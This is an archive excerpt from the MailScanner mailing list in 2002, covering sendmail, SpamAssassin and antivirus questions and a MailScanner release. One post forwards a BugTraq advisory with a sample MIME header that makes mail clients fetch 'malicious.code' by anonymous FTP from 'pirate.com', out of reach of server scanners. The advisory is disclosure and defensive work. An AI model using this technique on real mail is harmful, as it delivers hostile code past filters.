21:15:47 2006 Subject: ms won't return from ssh In-Reply-To: References: Message-ID: >>>>> "Eric" == Eric H writes: Eric> When I run a command like from mymachine: mymachine# ssh Eric> myothermachine /usr/local/sbin/restart.sendmail Eric> It will run the restart.sendmail script but it won't return Eric> back to the prompt, or more importantly the other script Eric> which ordinarily calls restart.sendmail. I don't know anything about the sendmail bits but check out the ssh manpage, especially the -t, -f and -n options. See if one of these helps, Sincerely, Adrian Phillips -- Your mouse has moved. Windows NT must be restarted for the change to take effect. Reboot now? [OK] From leet at LEENX.CO.ZA Fri Sep 27 08:25:23 2002 From: leet at LEENX.CO.ZA (C.Lee Taylor) Date: Thu Jan 12 21:15:47 2006 Subject: Sendmail Questions ... References: <200209262301.g8QN1Bi04914@zeus.scania.co.za> Message-ID: <3D9407E3.8020604@leenx.co.za> Greetings ... First I would like to thank everybody on this list, just reading alot of the mail has helped me, not just with mailscanner, but with sendmail too. Thanks guys. Now, more a sendmail question, but related to mailscanner. >Edit /etc/sysconfig/sendmail then restart sendmail. >>I changed my /var/run/sendmail.pid for "/usr/lib/sendmail -bd -q5m" and >>restart the mailscanner, but nothing. >> >>what can i do for change this Does mailscanner use the value in /etc/sysconfig/sendmail for queue timing? I think not, but that is my first question. Second, I would like to use mailscanner on a few servers with dial up accounts, which means I use the "expensive" option in the sendmail.cf file, but if I use mailscanner, it does not wait to be sent, plus I then also have problems with quick local delievery. Could I ask for help with this. Thanks. Mailed Lee From rabellino at DI.UNITO.IT Fri Sep 27 12:32:45 2002 From: rabellino at DI.UNITO.IT (Rabellino Sergio) Date: Thu Jan 12 21:15:47 2006 Subject: Latest SpamAssassin Message-ID: <3D9441DD.AE7155E1@di.unito.it> Dear List, which is the latest spamassassin release compatible with mailscanner 3.x on a production level installation ? Tks. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From brose at MED.WAYNE.EDU Fri Sep 27 14:53:25 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:47 2006 Subject: Latest SpamAssassin Message-ID: I have it running with 2.50 CVS before that it was 2.40. There were a couple pyzor/dcc bugs in 2.50 but they've been fixed. -----Original Message----- From: Rabellino Sergio [mailto:rabellino@DI.UNITO.IT] Sent: Friday, September 27, 2002 7:33 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Latest SpamAssassin Dear List, which is the latest spamassassin release compatible with mailscanner 3.x on a production level installation ? Tks. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From munafo at PREZZEMOLO.POLITO.IT Fri Sep 27 15:06:03 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:47 2006 Subject: Latest SpamAssassin In-Reply-To: <3D9441DD.AE7155E1@di.unito.it> References: <3D9441DD.AE7155E1@di.unito.it> Message-ID: <02092716060300.19890@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 27 September 2002 13:32, Rabellino Sergio wrote: > Dear List, > which is the latest spamassassin release compatible with mailscanner 3.x > on a production level installation ? > Official SA 2.41 runs without problems on my system (even if 'make test' produces a couple of warning with the latest Razor 2.152). Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9lGXQtgCCNnfQWWkRAlLyAJwMSPRLR0uiD53yE75bWpvMH4FOqwCgi+i2 aeHc2/lEeZhMyEPbEzueaJU= =TaSs -----END PGP SIGNATURE----- From E.H.Beekman at amc.uva.nl Fri Sep 27 15:36:23 2002 From: E.H.Beekman at amc.uva.nl (Ewald Beekman) Date: Thu Jan 12 21:15:47 2006 Subject: X-Spam-Level flag & hardware Message-ID: <20020927163623.U28751@oink.amc.uva.nl> I really like the Spam-Level flag of spamassassin: X-Spam-Level: ***** It makes it very easy to filter multiple levels of SPAM in various mailboxes. Is there a way to transport this flag in the outgoing email message? Also it would be nice to have an overview of how people are using mailscanner. For instance if al tests are succesfull i am planning to run mailscanner with sophos and spamassassin on two dual Xeon 1.4GHz boxes, 2GB RAM each, running RedHat Linux. Will this be sufficiant to process 2GB email per day? (I won't ask if sophos is the best av-engine to use, because that's probably a religious topic :). regards, Ewald... -- Ewald H. Beekman, Network Engineer, Academic Medical Center, dept. ADB/ICT Computer & Network Services, The Netherlands ## Your mind-mint is: "My life is a soap opera, but who has the rights?" -- MadameX From Stephane.Lentz at ANSF.ALCATEL.FR Fri Sep 27 16:30:39 2002 From: Stephane.Lentz at ANSF.ALCATEL.FR (Stephane Lentz) Date: Thu Jan 12 21:15:47 2006 Subject: Latest SpamAssassin In-Reply-To: References: Message-ID: <20020927153039.GA24686@iww.netfr.alcatel.fr> On Fri, Sep 27, 2002 at 09:53:25AM -0400, Rose, Bobby wrote: > I have it running with 2.50 CVS before that it was 2.40. There were a > couple pyzor/dcc bugs in 2.50 but they've been fixed. > For the daring there is some 2.42 pre-release available at : http://spamassassin.taint.org/devel/Mail-SpamAssassin-2.42.tar.gz If you've got time, test it and give feedback before monday. The official 2.42 will be out next week. Regards, SL/ --- Stephane Lentz / Alcanet International - Internet Services From LISTSERV at JISCMAIL.AC.UK Fri Sep 27 16:56:59 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:47 2006 Subject: MAILSCANNER: felt@DRUGGIST.GG.CALTECH.EDU left the list Message-ID: <200209271557.QAA02819@magpie.ecs.soton.ac.uk> Fri, 27 Sep 2002 16:56:59 Dave Felt has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Fri, 27 Sep 2002 16:56:56 +0100 Received: from druggist.gg.caltech.edu (root@druggist.gg.caltech.edu [131.215.129.11]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8RFuqX09605 for ; Fri, 27 Sep 2002 16:56:53 +0100 Received: from gg.caltech.edu (felt@waggle.gg.caltech.edu [131.215.129.135]) by druggist.gg.caltech.edu (8.9.3 (PHNE_25183)/8.9.3) with ESMTP id IAA16298; Fri, 27 Sep 2002 08:56:51 -0700 (PDT) Sender: felt@druggist.gg.caltech.edu Message-ID: <3D947FC3.634CC5CF@gg.caltech.edu> Date: Fri, 27 Sep 2002 08:56:51 -0700 From: David Felt X-Mailer: Mozilla 4.77 [en] (X11; U; HP-UX B.10.20 9000/770) X-Accept-Language: en MIME-Version: 1.0 To: listserv@jiscmail.ac.uk Subject: SIGNOFF MAILSCANNER Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From LISTSERV at JISCMAIL.AC.UK Fri Sep 27 17:03:53 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:47 2006 Subject: MAILSCANNER: fred@NEVER-MIND.CH requested to join Message-ID: <200209271603.RAA04072@magpie.ecs.soton.ac.uk> Fri, 27 Sep 2002 17:03:53 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Fr?d?ric Badel . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER fred@NEVER-MIND.CH Fr?d?ric Badel The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+fred%40NEVER-MIND.CH+Fr%E9d%E9ric+Badel&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Fri, 27 Sep 2002 17:03:53 +0100 Received: from a-cobalt2.cohprog.com (a-cobalt2.cohprog.com [193.247.238.196]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8RG3oX11590 for ; Fri, 27 Sep 2002 17:03:50 +0100 Received: from BONZAI (abanys.cohprog.com [193.247.238.218]) by a-cobalt2.cohprog.com (8.10.2/8.10.2) with SMTP id g8RG0LV27359 for ; Fri, 27 Sep 2002 18:00:21 +0200 From: "fred" To: "L-Soft list server at JISCMAIL \(1.8e\)" Subject: RE: Command confirmation request (351E0A16) Date: Fri, 27 Sep 2002 18:00:28 +0200 Message-ID: MIME-Version: 1.0 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <200209271553.g8RFrcV26998@a-cobalt2.cohprog.com> Importance: Normal X-MailScanner: Found to be clean X-MIME-Autoconverted: from 8bit to quoted-printable by ori.rl.ac.uk id g8RG3oX11590 X-LSVline1: ok From mailscanner at ecs.soton.ac.uk Fri Sep 27 17:48:14 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: clean_quarantine script In-Reply-To: <019001c265dd$4d0c6170$8201a8c0@proaccessph.com> Message-ID: <5.1.0.14.2.20020927174721.02d4aa88@imap.ecs.soton.ac.uk> At 05:21 27/09/2002, you wrote: >Hi, I'd like to clarify if the clean_quarantine script holds the data 9 days >from the present time? >thats what I observed. I haven't looked at the script recently, but I imagine it's got a "find" command in it. What's the number after the "-mtime" or "-ctime" or "-atime" option? That will be the number of days. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From tal at MUSICGENOME.COM Fri Sep 27 19:06:58 2002 From: tal at MUSICGENOME.COM (Tal Kelrich) Date: Thu Jan 12 21:15:47 2006 Subject: Fwd: Another possible RFC 2046 vulnerability. Message-ID: <5.1.1.6.0.20020927200656.00b9c270@mail.musicgenome.com> just saw this on bugtraq... we should check for it >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Sender: tijojo@ensmp.fr >Date: Fri, 27 Sep 2002 13:01:46 +0200 >From: Jose Marcio Martins da Cruz >Reply-To: jose@ensmp.fr >Organization: Ecole des Mines de Paris >X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686) >X-Accept-Language: fr-FR, en >To: bugtraq >Subject: Another possible RFC 2046 vulnerability. >X-Miltered: at paris by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")! >X-MailScanner: Found to be clean >X-MailScanner-SpamCheck: not spam, SpamAssassin (score=1.6, required 7, > TO_LOCALPART_EQ_REAL, DOUBLE_CAPSWORD) > > >Hi, > >Some days ago, we're talking about RFC 2046 message fragmentation >vulnerability. > >There is another related RFC 2046 vulnerability : message/external-body >message type. > >RFC 2046 message/external-body MIME type allows to send messages not by >it's content, but by reference. > >In this case, you can send a message with the following MIME tag : > > Content-Type: message/external-body; name="malicious.code"; > site="pirate.com"; mode="image"; > access-type=ANON-FTP; directory="pub" > >Client MUA, receives this and will get "malicious.code" file by >anonymous ftp from pirate.com ftp server. > >RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP", >"LOCAL-FILE", and "MAIL-SERVER". > >There are some other optional parameters to this feature. For example, >if the message includes parameter permission="write", existing file will >be overwriten. > >RFC 2046 says something about security in paragraph 5.2.3.6 : > > > (1) Accessing data via a "message/external-body" reference > > effectively results in the message recipient performing > > an operation that was specified by the message > > originator. It is therefore possible for the message > > originator to trick a recipient into doing something > > they would not have done otherwise. ... > >Combining different access-types (mainly anon-ftp, mail-server and >local-file) can create; IMHO, more complex attacks. > >What's interesting is that in this case the message and the malicious >code passes through two different network paths : messages is sent by >mail and the malicious code will be get by receiver by anonymous ftp. > >In the case of previous vulnerability (fragmented message), message and >malicious code uses the same network path. > >Classical mail server virus scanners will never see the malicious code >pass through it, as they will never have available entire malicious >code. > >The only way to detect it, IMHO, at mail server, is by lexical analysis >of MIME tags. > >Netscape Communicator 4.79 is compatible with this RFC 2046 feature. > >I can't say anything about others mail clients, as I'm sick at home and >I have no access to other MUAs. > >Attached to this message you'll find a message sent using this feature >and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can >check it out with Outlook and other popular MUAs. It's in the /var/mail >format : you can append it to your mailbox and try it... 8-) > >References : RFC 2046 - MIME - Media Types > >Jose Marcio > > >-- > ------------------------------------------------------------------- > Jose Marcio MARTINS DA CRUZ > Ecole Nationale Superieure des Mines de Paris > Centre de Calcul Tel . : 01.40.51.93.41 > 60, bd Saint Michel http://www.ensmp.fr/~martins > 75272 - PARIS CEDEX 06 mailto:martins@cc.ensmp.fr>From > martins@didi.ensmp.fr Wed Sep 18 10:40:02 2002 >Return-Path: >Received: from didi.ensmp.fr (didi [10.5.5.101]) > by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339 > for ; Wed, 18 Sep 2002 10:40:02 +0200 >Sender: martins@paris.ensmp.fr >Message-ID: <3D88395A.AE13841F@didi.ensmp.fr> >Date: Wed, 18 Sep 2002 10:29:14 +0200 >From: Jose Martins >Reply-To: tijojo@paris.ensmp.fr >X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686) >X-Accept-Language: en >MIME-Version: 1.0 >To: tijojo@adrian.ensmp.fr >Subject: tst attachment >Content-Type: multipart/mixed; > boundary="------------FA43411C8E35AC7F655DA077" >X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")! >Status: RO > >This is a multi-part message in MIME format. >--------------FA43411C8E35AC7F655DA077 >Content-Type: text/plain; charset=us-ascii >Content-Transfer-Encoding: 7bit > > >RFC 2046 message/external-body compatibility test > > >--------------FA43411C8E35AC7F655DA077 >Content-Type: message/external-body; name="rfc2046.Z"; > site="ftp.inria.fr"; mode="image"; > access-type=ANON-FTP; directory="rfc/rfc20xx" > > >--------------FA43411C8E35AC7F655DA077-- From munafo at PREZZEMOLO.POLITO.IT Fri Sep 27 18:00:11 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:47 2006 Subject: [OT] Which f-secure product is f-prot? In-Reply-To: <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> Message-ID: <02092719001100.24435@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 13 September 2002 18:11, Julian Field wrote: > Can I add a comment here that hopefully won't get me into too much trouble? > > F-Prot is a good product. > F-Secure is not. > > F-Secure will silently ignore any file whose pathname is longer than 256 > characters. > They admit to that on their own web site. > F-Secure will not scan any files whose name starts with a "." even when you > use the "--dumb" option which is supposed to force scanning of all files. > News on the F-Secure front. On their web site they just released an 'Important maintenance update' for their scanners. The hotfixed 4.15 Linux version now scans 'dot' files without problems. As for the pathname longer than 256 chars, the scanner issues a 'path to long' message. Maurizio - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9lI6gtgCCNnfQWWkRAkS4AKDUp5pe1cqBUck1mJTt12phXgOaSwCg90H7 sBWq/J1i+XzXzvXR/PenEKo= =xJd1 -----END PGP SIGNATURE----- From mkettler at EVI-INC.COM Fri Sep 27 18:19:18 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:47 2006 Subject: Sendmail Questions ... In-Reply-To: <3D9407E3.8020604@leenx.co.za> References: <200209262301.g8QN1Bi04914@zeus.scania.co.za> Message-ID: <5.1.1.6.0.20020927130602.01a05e58@192.168.50.2> Well, I can't help with your second question, but I can answer your first one. If you're using the Mailscanner startup script, it actually uses /etc/sysconfig/mailscanner, not /etc/sysconfig/sendmail, if it exists. So edit /etc/sysconfig/mailscanner. It does actually use that for the sendmail queue timing. Read /etc/rc.d/init.d/mailscanner for details. However your delivery mode settings can cause Mailscanner to call sendmail for delivery more often than the queue runs on it's own. Ie: if you have individual or batch instead of queue for your MailScanner delivery mode it will call sendmail directly for each email, or for each batch of emails. Of course, if you're not using the MailScanner startup script, then you should know how you configured sendmail to start :) ie: I don't use this mechanism at all, I start my sendmails with my own hacked-up script. But I might start using MailScanner's script now that it's pretty reasonable (I'm still running a rather old MailScanner) At 09:25 AM 9/27/2002 +0200, C.Lee Taylor wrote: > Does mailscanner use the value in /etc/sysconfig/sendmail for > queue timing? > I think not, but that is my first question. From novirus at CARLO65.DE Fri Sep 27 18:21:47 2002 From: novirus at CARLO65.DE (Roland Ehle) Date: Thu Jan 12 21:15:47 2006 Subject: AW: [MAILSCANNER] clean_quarantine script In-Reply-To: <019001c265dd$4d0c6170$8201a8c0@proaccessph.com> Message-ID: <000001c2664a$5c211440$0400a8c0@webarts.ffm> Hi Glynn, >From Glynn S. Condez on Friday, Sept 27, 2003 06:21 > Gesendet: Freitag, 27. September 2002 06:21 > An: MAILSCANNER@JISCMAIL.AC.UK > Betreff: [MAILSCANNER] clean_quarantine script > > > Hi, I'd like to clarify if the clean_quarantine script holds > the data 9 days from the present time? thats what I observed. If you use the clean-script, which can be downloaded from www.mailscanner.info, then you find a variable safetime. You just need to change its value to whatever meets your preferences. Kind regards, Roland Ehle Frankfurt, Germany From mailscanner at ecs.soton.ac.uk Fri Sep 27 19:09:18 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released Message-ID: <5.1.0.14.2.20020927190641.0544dd10@imap.ecs.soton.ac.uk> I have just released version 3.23-4. This includes detection and removal of messages with "external bodies" as defined in RFC2046 and recently highlighted on the BugTraq mailing list. It includes another patch to the MIME-tools modules, and a new copy of the MailScanner code. If you are using the tar distribution, please see my previous announcements recently for instructions on how to install the MIME-tools patch. If you are using the RPM distribution, just upgrade the RPM and all the patching will be done for you. Download, as usual, from www.mailscanner.info. Many thanks to Tal Kelrich for watching BugTraq like a hawk :-) Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 27 19:12:58 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <5.1.0.14.2.20020927190641.0544dd10@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020927191135.02e288b0@imap.ecs.soton.ac.uk> I meant to add that there is also a new release to V4 which includes this fix, as well as a few other new features. According to my WHATSNEW.txt in V4.... - "/etc/rc.d/init.d/MailScanner reload" or "service MailScanner reload" now work (or they will when I produce the RPMs). - Checks for, and corrects, MIME boundaries where an outer multipart/mixed boundary is a substring of an inner multipart/alternative boundary, as this causes problems for the Cyrus IMAP server and a few versions of Eudora still in use. - Checks for, and removes, messages containing external bodies that, according to RFC2046, can be held on external servers and are retrieved by FTP among other methods. Note this requires a 3rd patch to the MIME- tools modules which you will have to download from www.mailscanner.info. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 27 19:16:59 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: [OT] Which f-secure product is f-prot? In-Reply-To: <02092719001100.24435@prezzemolo.polito.it> References: <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020927191508.09ec8290@imap.ecs.soton.ac.uk> At 18:00 27/09/2002, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >On Friday 13 September 2002 18:11, Julian Field wrote: > > Can I add a comment here that hopefully won't get me into too much trouble? > > > > F-Prot is a good product. > > F-Secure is not. > > > > F-Secure will silently ignore any file whose pathname is longer than 256 > > characters. > > They admit to that on their own web site. > > F-Secure will not scan any files whose name starts with a "." even when you > > use the "--dumb" option which is supposed to force scanning of all files. > > > >News on the F-Secure front. On their web site they just released an >'Important maintenance update' for their scanners. >The hotfixed 4.15 Linux version now scans 'dot' files without problems. >As for the pathname longer than 256 chars, the scanner issues a 'path to >long' message. And so recently after I mailed their support address indicating my disgust in seeing these bugs. Oh my, what a coincidence :-) They never replied to me (of course) but it at least looks like they fixed the more glaring of the holes. Why they cannot increase 256 to 256000 I don't know :-( -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From fizz at BOMB.NET Fri Sep 27 20:24:56 2002 From: fizz at BOMB.NET (Kelly Hamlin) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <5.1.0.14.2.20020927190641.0544dd10@imap.ecs.soton.ac.uk> Message-ID: <000001c2665b$8ff35060$483cd842@fizz> Can u either upload .tar distro or fix link? :) thanks.. ////// ( o o ) +--.oooO--(_)--Oooo.-----------------+ | [Kelly Hamlin] | support@cyberstreet.com | http://www.cyberstreet.com | .oooO | ( ) Oooo. +--- (----( )----------------------------+ \_) ) / (_/ -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Friday, September 27, 2002 2:09 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: ANNOUCE: Version 3.23-4 released I have just released version 3.23-4. This includes detection and removal of messages with "external bodies" as defined in RFC2046 and recently highlighted on the BugTraq mailing list. It includes another patch to the MIME-tools modules, and a new copy of the MailScanner code. If you are using the tar distribution, please see my previous announcements recently for instructions on how to install the MIME-tools patch. If you are using the RPM distribution, just upgrade the RPM and all the patching will be done for you. Download, as usual, from www.mailscanner.info. Many thanks to Tal Kelrich for watching BugTraq like a hawk :-) Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From james at PCXPERIENCE.COM Fri Sep 27 23:31:08 2002 From: james at PCXPERIENCE.COM (James A. Pattie) Date: Thu Jan 12 21:15:47 2006 Subject: [Fwd: mail scanner] Message-ID: <3D94DC2C.6080608@pcxperience.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 My boss wants to know if this is feasible. :) - -- James A. Pattie james@pcxperience.com Linux -- SysAdmin / Programmer Xperience, Inc. http://www.pcxperience.com/ http://www.xperienceinc.com/ GPG Key Available at http://www.pcxperience.com/gpgpkeys/james.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9lNwqtUXjwPIRLVERAn8JAKDxq4UzwWqiZpf5b18tTxmlJB4GBACghp9n jVdBOkI0u5VQvrRmK1F71+Q= =UXQ3 -----END PGP SIGNATURE----- -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- An embedded message was scrubbed... From: moreejt@pcxperience.com Subject: mail scanner Date: Fri, 27 Sep 2002 16:57:25 -0500 Size: 1202 Url: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020927/f911c257/mailscanner.mht From brose at MED.WAYNE.EDU Fri Sep 27 23:49:01 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:47 2006 Subject: [Fwd: mail scanner] Message-ID: Doesn't most virus scanners do this anyway? -----Original Message----- From: James A. Pattie [mailto:james@PCXPERIENCE.COM] Sent: Friday, September 27, 2002 6:31 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: [Fwd: mail scanner] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 My boss wants to know if this is feasible. :) - -- James A. Pattie james@pcxperience.com Linux -- SysAdmin / Programmer Xperience, Inc. http://www.pcxperience.com/ http://www.xperienceinc.com/ GPG Key Available at http://www.pcxperience.com/gpgpkeys/james.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9lNwqtUXjwPIRLVERAn8JAKDxq4UzwWqiZpf5b18tTxmlJB4GBACghp9n jVdBOkI0u5VQvrRmK1F71+Q= =UXQ3 -----END PGP SIGNATURE----- -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. From mailscanner at ecs.soton.ac.uk Sat Sep 28 00:56:43 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: [Fwd: mail scanner] In-Reply-To: <3D94DC2C.6080608@pcxperience.com> Message-ID: <5.1.0.14.2.20020928005547.01e1b0f0@imap.ecs.soton.ac.uk> At 23:31 27/09/2002, you wrote: >My boss wants to know if this is feasible. :) Not very easy. I've always left that job to the virus scanners. Most of the decent ones support virtually every archive format in existence. >- -- >James A. Pattie >james@pcxperience.com > >Linux -- SysAdmin / Programmer >Xperience, Inc. >http://www.pcxperience.com/ >http://www.xperienceinc.com/ > >GPG Key Available at http://www.pcxperience.com/gpgpkeys/james.html >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.6 (GNU/Linux) >Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > >iD8DBQE9lNwqtUXjwPIRLVERAn8JAKDxq4UzwWqiZpf5b18tTxmlJB4GBACghp9n >jVdBOkI0u5VQvrRmK1F71+Q= >=UXQ3 >-----END PGP SIGNATURE----- > >-- >This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. > >Return-Path: >X-Sieve: cmu-sieve 2.0 >Received: (from apache@localhost) > by www.dmz.pcxperience.com (8.11.6/8.11.6) id g8RLvQj04543 > for james@pcxperience.com; Fri, 27 Sep 2002 16:57:26 -0500 >From: moreejt@pcxperience.com >Received: from 192.168.1.60 ( [192.168.1.60]) > as user moreejt@www.dmz.pcxperience.com by www.pcxperience.com > with HTTP; > Fri, 27 Sep 2002 16:57:25 -0500 >Message-ID: <1033163845.3d94d445e14d8@www.pcxperience.com> >Date: Fri, 27 Sep 2002 16:57:25 -0500 >To: james@pcxperience.com >Subject: mail scanner >MIME-Version: 1.0 >Content-Type: text/plain; charset=ISO-8859-1 >Content-Transfer-Encoding: 8bit >User-Agent: Internet Messaging Program (IMP) 3.1 >X-Originating-IP: 192.168.1.60 > > > >Hey, A great feature (that would involve alot of work to implement) would be >configuration options to disect certain files and then scan them, such as >gzip. >bzip2, etc. > >This way if your particular virus scanner does not support bzip2 files it >wouldn't matter as much bc mailscanner could be configured to uncomprss >the file >then scan it. > >------------------------------------------------- >This mail sent through IMP: http://horde.org/imp/ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Sat Sep 28 00:54:35 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:47 2006 Subject: ANNOUCE: Version 3.23-4 released In-Reply-To: <000001c2665b$8ff35060$483cd842@fizz> References: <5.1.0.14.2.20020927190641.0544dd10@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020928005222.01dda0b8@imap.ecs.soton.ac.uk> At 20:24 27/09/2002, you wrote: >Can u either upload .tar distro or fix link? :) Sorry about that. Long day (our students all start returning on Monday, so work is kinda busy :-) Fixed now. BTW Next feature for V4 is rules that match when all of the sender and recipient addresses match the rule test. That way you can do things like not sign messages which are internal, but sign everything else coming in or out. Thanks to Emily for the idea! >thanks.. > > > ////// > ( o o ) >+--.oooO--(_)--Oooo.-----------------+ >| [Kelly Hamlin] >| support@cyberstreet.com >| http://www.cyberstreet.com >| .oooO >| ( ) Oooo. >+--- (----( )----------------------------+ > \_) ) / > (_/ > > >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Friday, September 27, 2002 2:09 PM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: ANNOUCE: Version 3.23-4 released > >I have just released version 3.23-4. > >This includes detection and removal of messages with "external bodies" >as >defined in RFC2046 and recently highlighted on the BugTraq mailing list. > >It includes another patch to the MIME-tools modules, and a new copy of >the >MailScanner code. > >If you are using the tar distribution, please see my previous >announcements >recently for instructions on how to install the MIME-tools patch. > >If you are using the RPM distribution, just upgrade the RPM and all the >patching will be done for you. > >Download, as usual, from www.mailscanner.info. > 